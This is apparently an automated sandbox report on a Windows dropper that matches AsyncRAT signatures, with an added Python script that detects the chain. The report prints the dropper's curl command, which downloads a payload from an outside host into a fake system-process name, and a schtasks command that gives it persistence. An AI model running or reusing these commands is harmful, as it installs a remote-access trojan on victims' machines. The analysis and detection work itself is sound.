                            Source: curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272971937.0000016CB93A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe
                            Source: curl.exe, 00000004.00000002.1273183923.0000016CB93CB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1272893130.0000016CB93CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe(
                            Source: curl.exe, 00000004.00000002.1273129101.0000016CB9390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2.hypixel.cfd/svchost.exe-oC:
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                            Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000005.00000003.1364653557.00000135A5647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                            Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
                            Source: unknown | HTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C91C0D0 system, GetConsoleWindow, GetWindowLongW, SetWindowLongW, SetLayeredWindowAttributes, GetConsoleWindow, ShowWindow, system, _beginthreadex, system, _Thrd_detach, system, std::cout, operator<<, std::cout, operator<<, CreateThread, CreateThread, Sleep, std::cout, operator<<, std::cout, operator<<, std::cout, operator<<, CreateThread, remove, Sleep, GetConsoleWindow, ShowWindow, system, std::cout, std::cout, std::cout, operator<<, std::cout, std::cout, operator<<, std::cout, std::cout, operator<<, std::cout, std::cout, std::cout, std::cout, operator<<, std::cout, std::cout, operator<<, std::cout, std::cout, operator<<, std::cout, std::cout, std::cout, std::cout, operator<<, std::cout, std::cout, operator<<, std::cout, std::cout, operator<< (std::cout and operator<< are the MSVC-mangled names ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A and ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, i.e. std::basic_ostream<char>::operator<<(std::ostream& (*)(std::ostream&)), the overload used for manipulators such as std::endl)
                            Source: C:\Windows\StartMenuExperienceHost.exe | Window created: window name: CLIPBRDWNDCLASS

                            Operating System Destruction

                            Source: C:\Windows\StartMenuExperienceHost.exe | Process information set: 01 00 00 00 (ProcessBreakOnTermination enabled, so killing the process bugchecks the host; this is the "Protects its processes via BreakOnTermination flag" signature)

                            System Summary

                            Source: sslproxydump.pcap, type: PCAP | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Windows\System32\curl.exe | File created: C:\Windows\StartMenuExperienceHost.exe
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C91C0D0
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C919A10
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C9121E0
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C914350
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C91FE40
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C913660
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C914E70
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B24F1
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B6226
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B1779
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B6FD2
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3BFCA9
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B10C5
                            Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 16_2_00007FFAAC3E1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 16_2_00007FFAAC3E10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 16_2_00007FFAAC3E2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 18_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 18_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 18_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 19_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 19_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 19_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 20_2_00007FFAAC3D1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 20_2_00007FFAAC3D10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 20_2_00007FFAAC3D2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 23_2_00007FFAAC3E1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 23_2_00007FFAAC3E10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 23_2_00007FFAAC3E2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 25_2_00007FFAAC3C1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 25_2_00007FFAAC3C10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 25_2_00007FFAAC3C2259
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 27_2_00007FFAAC3A1779
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 27_2_00007FFAAC3A10FA
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Code function: 27_2_00007FFAAC3A2259
                            Source: sslproxydump.pcap, type: PCAP | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: StartMenuExperienceHost.exe.4.dr, CQg6RO8lWJcEYht.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, k7DEUthG3QSrccC.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, CQg6RO8lWJcEYht.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: svchost.exe.12.dr, k7DEUthG3QSrccC.cs | Cryptographic APIs: 'TransformFinalBlock'
                            Source: StartMenuExperienceHost.exe.4.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.cs | Base64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'
                            Source: svchost.exe.12.dr, RrgnVVd2FggAleXTu6jzSzDBhYAhkFKt0RWLUcYy.cs | Base64 encoded string: 'V3UD2FZVIi3SYqeofALEN2tiKpgIowf6nPUDeiDeIwlPDjehV4IrS02lC5sZFYwn', 'KE3+yN2URlkwJR1XJK3rEAoSCVhFQvSlcVwHbOmPvRvFNp+GqH+yR42XPJnW/LqY'
                            Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: StartMenuExperienceHost.exe.4.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: svchost.exe.12.dr, CXI8pRDzkszq5HX6ifwmQi7CGwo84thmNTLid5H5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engine | Classification label: mal100.troj.evad.winEXE@30/6@4/5
                            Source: C:\Windows\StartMenuExperienceHost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2552:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                            Source: C:\Windows\StartMenuExperienceHost.exe | Mutant created: \Sessions\1\BaseNamedObjects\HtJDJt7FEenilHh1
                            Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7848:120:WilError_03
                            Source: C:\Windows\StartMenuExperienceHost.exe | File created: C:\Users\user\AppData\Local\Temp\svchost.exe
                            Source: 18sFhgSyVK.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Windows\StartMenuExperienceHost.exe | File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: 18sFhgSyVK.exe | ReversingLabs: Detection: 23%
                            Source: unknown | Process created: C:\Users\user\Desktop\18sFhgSyVK.exe "C:\Users\user\Desktop\18sFhgSyVK.exe"
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color b
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\StartMenuExperienceHost.exe C:\Windows\StartMenuExperienceHost.exe
                            Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                            Source: C:\Windows\StartMenuExperienceHost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
                            Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user~1\AppData\Local\Temp\svchost.exe
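The process list above is the whole staging and persistence chain in three observable steps: the dropper runs cmd /c curl to pull https://r2.hypixel.cfd/svchost.exe straight into C:\Windows\StartMenuExperienceHost.exe, launches that file, and the launched payload copies itself to %TEMP%\svchost.exe and registers a scheduled task named "svchost" with /RL HIGHEST that re-runs the copy every minute. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it turns those three observations into detection checks and runs them over process-creation records constructed to mirror the report's process list (image path plus command line, the fields Sysmon Event ID 1 calls Image and CommandLine). The expected-directory table for svchost.exe and StartMenuExperienceHost.exe, the user-writable path markers and the "every 5 minutes or faster" threshold are the example's own assumptions, not facts the report states.

```python
"""Detection checks for the download / name-impersonation / scheduled-task
chain. Added example, not code from the Joe Sandbox report or the sample.
The EVENTS list is constructed to mirror the report; it is not captured
telemetry."""
import shlex
from pathlib import PureWindowsPath

# Assumption of this example: the only directories Windows ships these
# binary names from. svchost.exe belongs in System32/SysWOW64 and
# StartMenuExperienceHost.exe is a packaged app under C:\Windows\SystemApps.
# The same name anywhere else is impersonating a system process (the
# report's "Files With System Process Name In Unsuspected Locations" hit).
EXPECTED_DIRS = {
    "svchost.exe": ("c:\\windows\\system32", "c:\\windows\\syswow64"),
    "startmenuexperiencehost.exe": ("c:\\windows\\systemapps",),
}

# Assumption: path fragments marking locations an unprivileged user can write.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")

# Constructed (image, command line) records modelled on the report's process
# list. Record 4 is the genuine NetworkService svchost and must not fire.
EVENTS = [
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\system32\\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe "
     "-o C:\\Windows\\StartMenuExperienceHost.exe --silent"),
    ("C:\\Windows\\System32\\curl.exe",
     "curl https://r2.hypixel.cfd/svchost.exe -o C:\\Windows\\StartMenuExperienceHost.exe --silent"),
    ("C:\\Windows\\StartMenuExperienceHost.exe",
     "C:\\Windows\\StartMenuExperienceHost.exe"),
    ("C:\\Windows\\System32\\schtasks.exe",
     '"C:\\Windows\\System32\\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
     '/tn "svchost" /tr "C:\\Users\\user~1\\AppData\\Local\\Temp\\svchost.exe"'),
    ("C:\\Windows\\System32\\svchost.exe",
     "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"),
    ("C:\\Users\\user\\AppData\\Local\\Temp\\svchost.exe",
     "C:\\Users\\user~1\\AppData\\Local\\Temp\\svchost.exe"),
]


def _argv(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes.
    Non-POSIX shlex leaves backslashes alone; quotes are stripped afterwards."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def _basename(path):
    return PureWindowsPath(path).name.lower()


def off_path_system_name(image):
    """True when the image carries a system-binary name but does not live in
    that binary's expected directory (or a subdirectory of it)."""
    p = PureWindowsPath(image)
    expected = EXPECTED_DIRS.get(p.name.lower())
    if expected is None:
        return False
    parent = str(p.parent).lower()
    return not any(parent == d or parent.startswith(d + "\\") for d in expected)


def curl_drops_executable(cmdline):
    """Return the output path when curl (directly or behind cmd /c) is told to
    save a .exe under C:\\Windows or a user-writable directory, else None."""
    argv = _argv(cmdline)
    lowered = [a.lower() for a in argv]
    if argv and _basename(argv[0]) == "cmd.exe" and "/c" in lowered:
        argv = argv[lowered.index("/c") + 1:]          # unwrap cmd /c <command>
    if not argv or _basename(argv[0]) not in ("curl", "curl.exe"):
        return None
    for flag, value in zip(argv, argv[1:]):
        if flag.lower() in ("-o", "--output"):
            low = value.lower()
            if low.endswith(".exe") and (low.startswith("c:\\windows\\")
                                         or any(m in low for m in USER_WRITABLE)):
                return value
    return None


def schtasks_persistence(cmdline):
    """Return the reasons a schtasks /create call looks like malware
    persistence, or None when it is not such a call or nothing is suspicious."""
    argv = _argv(cmdline)
    lowered = [a.lower() for a in argv]
    if not argv or _basename(argv[0]) not in ("schtasks", "schtasks.exe") \
            or "/create" not in lowered:
        return None
    # Pair each "/switch value"; bare switches such as /f and /create take none.
    opts = {lowered[i]: argv[i + 1] for i in range(len(argv) - 1)
            if lowered[i].startswith("/") and not lowered[i + 1].startswith("/")}
    reasons = []
    if opts.get("/sc", "").lower() == "minute" and opts.get("/mo", "").isdigit() \
            and int(opts["/mo"]) <= 5:
        reasons.append("repeats every %s minute(s)" % opts["/mo"])
    if opts.get("/rl", "").lower() == "highest":
        reasons.append("runs with highest privileges")
    if any(m in opts.get("/tr", "").lower() for m in USER_WRITABLE):
        reasons.append("action lives in a user-writable path")
    return reasons or None


def scan(events):
    """Run all three checks over (image, command line) records and return
    (record index, rule name, detail) triples."""
    findings = []
    for idx, (image, cmdline) in enumerate(events):
        if off_path_system_name(image):
            findings.append((idx, "system-process name outside its directory", image))
        dropped = curl_drops_executable(cmdline)
        if dropped:
            findings.append((idx, "curl writes an executable to disk", dropped))
        reasons = schtasks_persistence(cmdline)
        if reasons:
            findings.append((idx, "schtasks persistence", "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for idx, rule, detail in scan(EVENTS):
        print("record %d: %s -> %s" % (idx, rule, detail))
```

Run as written it reports five findings: the download twice (once on the cmd.exe record, once on the curl.exe record), the off-path C:\Windows\StartMenuExperienceHost.exe, the schtasks command with all three reasons, and the %TEMP%\svchost.exe start; the genuine svchost.exe -k NetworkService record is not flagged. The Startup-folder svchost.lnk and the HtJDJt7FEenilHh1 mutex from the report are further host indicators that the same records would not show and are worth adding to a file- and object-creation rule.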
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: msvcp140.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: vcruntime140_1.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: vcruntime140.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: vcruntime140.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: vcruntime140_1.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: vcruntime140.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
                            Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
